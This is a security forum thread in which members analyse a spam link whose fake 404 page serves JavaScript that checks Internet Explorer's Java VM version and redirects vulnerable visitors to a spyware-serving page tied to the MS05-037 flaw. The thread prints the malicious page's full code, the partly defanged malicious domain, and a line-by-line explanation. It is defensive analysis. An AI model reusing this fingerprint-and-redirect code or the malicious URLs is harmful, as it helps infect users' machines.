Always getting a 404 error :(

[Nikkytas]

Friend of mine tell me about some statistic information available at this page:

http:/www.abetterstart.com/c/2000/counter21.php

However, every time i hit it, it says 404 error, while my friend getting content page.

I don't think i doing anything wrong, but damn... I just can't figure what can be done to get this page visible :((((

[mubix]

Friend of mine tell me about some statistic information available at this page:

http:/www.abetterstart.com/c/2000/counter21.php

However, every time i hit it, it says 404 error, while my friend getting content page.

I don't think i doing anything wrong, but damn... I just can't figure what can be done to get this page visible :((((

I have taken one of the "/" out of your post until I can determine if this is spam, something else, or completely legit.

[Sparda]

It's definitively spam, that isn't the server genuine 404 error.

Set your user agent to IE and it returns (what appears to be) a JavaScript exploit for IE, the code is shown below (but not all the code, there is more if you follow the JavaScript URLs, you will eventually end up at this page:http:/www.abetterstart.com/c/2000/counter21.php?j=1, could be a exploit payload):

<HTML>

<HEAD>

<TITLE>404 error - Document Not Found</TITLE>

</HEAD>

<STYLE>

BODY {

BEHAVIOR: url(#default#clientCaps)

}

</STYLE>

<BODY id=testing>

<script language='javascript'>

var i,l,v;

num = 3;

s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';

l = testing.isComponentInstalled(s,'ComponentID');

v = testing.getComponentVersion(s,'ComponentID');

if (l == true) {

x = v.split(',');

if ( (x[0]!=0) && (x[2]<3810) ) {

num = 1;

}

}

c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;

window.location = c;

</script>

</BODY>

</HTML>

Well... this is either spam or the guy asking was smart enough to use Firefox and not get his box owned

[mubix]

That isn't exploit code, it's just checking if Java is installed, a specific version and allowed. Then it hops you to the next site that infects your computer with spyware. Just ran it through a sandbox.

I took your URL out as well. I don't want people clicking on it on accident.

It's Vako's call if he wants it gone.

[Sparda]

So the Java app brakes out of the Java VM?

[mubix]

So the Java app brakes out of the Java VM?

If you can find out what version of Java 3810 is (3810 is the VM version) then we could start looking for what exploits work against versions lower that in:

[mubix]

Code explained:

Initialize Javascript and declare variables: (no big deal)

<script language='javascript'>

var i,l,v;

num = 3;

This is the register entry for Internet Explorer for the Java component. Run regedit and do a search just for the alphanumerics in the brackets:

s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';

You should find it at: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupClsidFeature

Uses a boolen test to verify that the Java component exists:

l = testing.isComponentInstalled(s,'ComponentID');

Saves the whole value of the registry key to the value 'v':

v = testing.getComponentVersion(s,'ComponentID');

Mine looked like this -> {08B0E5C0-4FCB-11CF-AAA5-00401C608500}!5,0,3200,0

This is where it starts checking for what it wants:

Is the component installed? If yes, continue:

if (l == true) {

Split up the 'v' variable using the delimiter ",":

x = v.split(',');

If there is a version and it is less than 3810 then change "num" to 1;

if ( (x[0]!=0) && (x[2]<3810) ) {

num = 1;

Send the user to a specific site based on the results and value of "num"

 c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;

window.location = c;

So, people who are "vulnerable" would go to: http:/www.abetterstart.com/v/200/counter21.php?b=1

And those who aren't go to: http:/www.abetterstart.com/v/200/counter21.php?b=3

again, with the "/" taken out.

[VaKo]

It's Vako's call if he wants it gone.

Nope, this is perfect. Instead of idle threats against the spammer, you've actually gone threw what its trying to do. Net result: We all learned a little more and the spammer is exposed.

[cooper]

Which version of Java did you have installed on that sandbox?

Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away?

[mubix]

Which version of Java did you have installed on that sandbox?

Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away?

Google

[cooper]

That was the tip I needed.

They're testing to see if you're vulnerable to the problem in the JView Profiler which could allow remote code execution.

Microsoft Advisory MS05-37: http://www.microsoft.com/technet/security/...n/MS05-037.mspx

Secunia Advisory SA15891: http://secunia.com/advisories/15891/

Version 3810 specifically fixes this particular problem, which started out with this: http://www.microsoft.com/technet/security/...ory/903144.mspx

The flaw was originally discovered in july 2005 so if you didn't update your system since then... Well, in that case you kinda deserve to get hacked, really.

[Sparda]

You don't really need to update widows for this attack to fail.. you just need to not use IE.

[mubix]

Yes, but the question is not how many of "US" this attack will fail against. It's how many of our mothers and fathers and grandparents this attack will fail against. How many organizations use IE because of policy, and not allow installation of Firefox or Opera? Statistics is a scary thing when you start thinking global.